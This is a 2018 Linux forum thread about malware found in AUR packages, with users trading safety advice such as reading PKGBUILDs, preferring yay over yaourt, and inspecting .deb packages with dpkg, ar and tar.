Malware in the AUR
Welcome, Guest.

ANNOUNCEMENT:

Click the CHAT button above for connection details. Show up early, seating is limited, late entries will not be registered.
Make sure you show up for game night! We have prize giveaways just for being there! Anyone can win!

Author Topic: Malware in the AUR  (Read 459 times)

Offline Siva

  • Staff Member
  • ********
  • Posts: 23
  • Country: 00
  • "We're all mad here"
Malware in the AUR
« on: July 12, 2018, 04:28:00 AM »
Three programs were tampered wuth by someone named xeactor.
You are not allowed to view links. Register or Login

Offline CwF

  • Full Member
  • ****
  • Posts: 249
  • Country: us
Re: Malware in the AUR
« Reply #1 on: July 12, 2018, 03:44:26 PM »
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, it's entire history of safety means nothing.
And who's looking for a better pdf reader?

Offline Kalthrix

  • Staff Member
  • ********
  • Posts: 1068
  • Country: us
Re: Re: Malware in the AUR
« Reply #2 on: July 12, 2018, 07:56:56 PM »
You are not allowed to view links. Register or Login
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, it's entire history of safety means nothing.
And who's looking for a better pdf reader?

Honestly, the only use I have found for the older "acroread (Adobe Reader 9)" package is to display fillable PDF documents that actively refuse to display on any other PDF editor/viewer. You'll see this a lot with state, court, and federal documents. Some businesses working in realty and financial will use the same. It's irritating to say in the least. Not sure if the intent was to reach that incredibly small crowd that still use the package, to test waters to gauge reaction time from the community considering it is a rarely used package, or if the intent was to target those that prefer to use commercial software vs the open source alternatives (although old) due to familiarity.

I'll never understand people that do this. If it is just to spite others or what their actual motivation is? Why not either improve the package or make one that is better? Adobe obviously has no interest in maintaining it or we would have seen Reader or Acrobat DC brought to Linux already.
You are not allowed to view links. Register or Login

Offline fraterchaos

  • Mandelbrot Metal Mayhem!
  • Staff Member
  • ********
  • Posts: 808
  • Country: us
  • Never underestimate the power of human stupidity
    • Skype
Re: Re: Malware in the AUR
« Reply #3 on: July 12, 2018, 10:25:59 PM »
You are not allowed to view links. Register or Login
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, it's entire history of safety means nothing.
And who's looking for a better pdf reader?

the one way in which linux can be safer is that being open source, it means a lot more people are going over the code that is added... so it's more likely that malware will be caught sooner. And when it's caught it is nearly always addressed more quickly than you could expect MS or Apple to do it. They only have a profit motive.

Not saying it's perfect, open source also enables more people to be able to add suspicious code from the start... but it still has a better chance of getting caught more quickly, I think.
Science, like Nature, must also be tamed... with a view towards it's preservation. -- Rush

Offline CwF

  • Full Member
  • ****
  • Posts: 249
  • Country: us
Re: Re: Re: Malware in the AUR
« Reply #4 on: July 13, 2018, 02:59:10 PM »
You are not allowed to view links. Register or Login
... but it still has a better chance of getting caught more quickly, I think.
I think that's generally right. That's why I'm happy with apt-get stable debian, perhaps the safest around. Once we start after the most current, or allow 'user content' or ppa's, or encourage something idiotic like flatpacks, trust ends. Even compiling from source is suspect, like you actually reviewed the code. I did say a user click. Look how stuff is getting into android. Once 'stable' is extended into 'want' we let our guard down.

I'm aware of the propriety pdf stuff. It's sad the government is so stupid in it's conflicts of interest. I'm still amazed some states went through the silverlight phase. It just proves most aren't paying attention..

Since the potential audience (target) was tiny in this case I suspect a grey hat demonstration.

Offline Siva

  • Staff Member
  • ********
  • Posts: 23
  • Country: 00
  • "We're all mad here"
Re: Malware in the AUR
« Reply #5 on: July 19, 2018, 12:29:47 PM »
Flatpaks can be safer. For example Openra relies on Mono and Mono adds CA certs to your system.

Installing the flatpak segregates it to it own part of your system.

Offline Spatry

  • Benevolent Dictator
  • Administrator - Sysop
  • **********
  • Posts: 4975
  • Country: us
  • Cup of Linux Founder
    • Cup of Linux
Re: Malware in the AUR
« Reply #6 on: July 19, 2018, 09:18:38 PM »
I cannot stress this enough.... When using yaourt or any other AUR helper, READ THE PKGBUILD! It will tell you what sources it is downloading.... alternatively you can download the AUR snapshot to a temp directory and run makepkg against it.... then you can look into the sources before you install the compiled package to ensure you are not getting any malware.... the AUR is a magnificent tool but it can also be your undoing if you do not exercise a little CARE.

Something I did not think of: if you are installing a package with -bin in the name, odds are you are getting a blob compiled against Ubuntu, Fedora or some other distro... in those cases you do not get the source but if it contains malware there will be comments posted on the AUR page... Always a good idea to read the comments....
"Wipe that NERVOUS expression off of your face, 3PO!" -General Leia Organa SWTLJ

Offline lcRONOS

  • I will run all the Operating Systems!
  • Staff Member
  • ********
  • Posts: 751
  • Country: us
Re: Malware in the AUR
« Reply #7 on: September 14, 2018, 01:25:24 PM »
I know this is a little old, but just to add on to what Spatry said here, be mindful of which AUR helper you use (if you use one at all).
Yaourt got a lot of love back in the day, and definitely has a nice UI, but there is a security flaw with it. When it downloads a package from the AUR, it will source the PKGBUILD file before asking you if you want to see it. The problem with this is that if any malicious shell commands are inserted in the PKGBUILD, those commands will be run before you see them. I highly recommend that Yaourt fans switch to Yay (Yet Another Yogurt). As the name implies, it is influenced by Yaourt, and can be used in the same way with a similar interface. Additionally, it can use pacman-style syntax for people who prefer that. It has more features than Yaourt, and does not have that security flaw.
Laptop: HP Pavilion 15t, quadboot Obarun Linux, macOS 10.13, TrueOS, Windows 10
Desktop: Dell Inspiron 660, dualboot Artix Linux,Windows 1
You are not allowed to view links. Register or Login

Offline Kueller

  • Spatry's Security Guard
  • Staff Member
  • ********
  • Posts: 324
  • Country: us
Re: Malware in the AUR
« Reply #8 on: September 14, 2018, 04:19:16 PM »
Late to this subject but "safer" is a relative term. Anything can be compromised and good safety should never be left alone. Still, Linux has proven itself to be safer beyond just catching vulnerabilities earlier due to the open source model (although that certainly helps).

The AUR is inherently an insecure source though that requires more caution on your part. Standard repositories are of course safer.

Offline swarfendor437

  • Jr. Member
  • ***
  • Posts: 59
  • Country: 00
  • Not f'd:You won't find me on facebook/social media
Re: Malware in the AUR
« Reply #9 on: November 29, 2018, 05:18:06 PM »
As stated elesewhere, a theme could wipe a drive clean: example of a theme was Ubundows on gnome-look.org which executed the unix code to wipe the GNU/Linux installation and everything with it. That's why I shared Blackwolf's (ex-Moderator on Ultimate Edition Oz forum - respect) advice on inspecting tarballs on the Zorin Forum and I also included in the Unofficial Manual I wrote for Zorin 12.x:

"h. Inspect 3rd Party .deb packages before installing: These should always be inspected before 'extracting' as whilst not a virus, malicious code could be lurking there:
 "I always open the debs and check for suspicious post-install scripts
This is how to do that. ... 
Listing the files from a debian package using dpkg -c 
dpkg is the package manager for debian. So using dpkg command you can list and extract the packages, as shown below.
To view the content of *.deb file: 
Code: 
:
 $ dpkg -c ovpc_1.06.94-3_i386.deb
 dr-xr-xr-x root/root 0 2010-02-25 10:54 ./
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/lib/
dr-xr-xr-x root/root 0 2010-02-25 10:48 ./ovpc/pkg/lib/header/ 
-r-xr-xr-x root/root 130 2009-10-29 17:06 ./ovpc/pkg/lib/header/libov.so
.
.
.
-r-xr-xr-x root/root 131 2009-10-29 17:06 ./ovpc/pkg/etc/conf
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/etc/conf/log.conf
Extracting the files from a debian package using dpkg -x
Use dpkg -x to extract the files from a deb package as shown below.
Code: 
:
$ dpkg -x ovpc_1.06.94-3_i386.deb /tmp/ov
$ ls /tmp/ov 
ovpc 
DEB files are ar archives, which always contains the three files — debian-binary, control.tar.gz, and data.tar.gz. We can use ar command and tar command to extract and view the files from the deb package, as shown below.
First, extract the content of *.deb archive file using ar command.
Code: 

$ ar -vx ovpc_1.06.94-3_i386.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz 
$
Next, extract the content of data.tar.gz file as shown below.
Code: : $ tar -xvzf data.tar.gz 
./
./ovpc/
./ovpc/pkg/
./ovpc/pkg/lib/
./ovpc/pkg/lib/header/ 
./ovpc/pkg/lib/header/libov.so 
.
.
./ovpc/pkg/etc/conf
./ovpc/pkg/etc/conf/log.con " [With acknowledgement to Blackwolf on ultimateeditionoz.com forum – sadly the forum is no more]. There was an instance of a GNU/Linux theme uploaded to gnome-look.org called Ubundows that had not been checked by Admin for that site; the file once extracted executed 'Unix' commands to wipe the hard drive clean of all content - YOU HAVE BEEN WARNED!"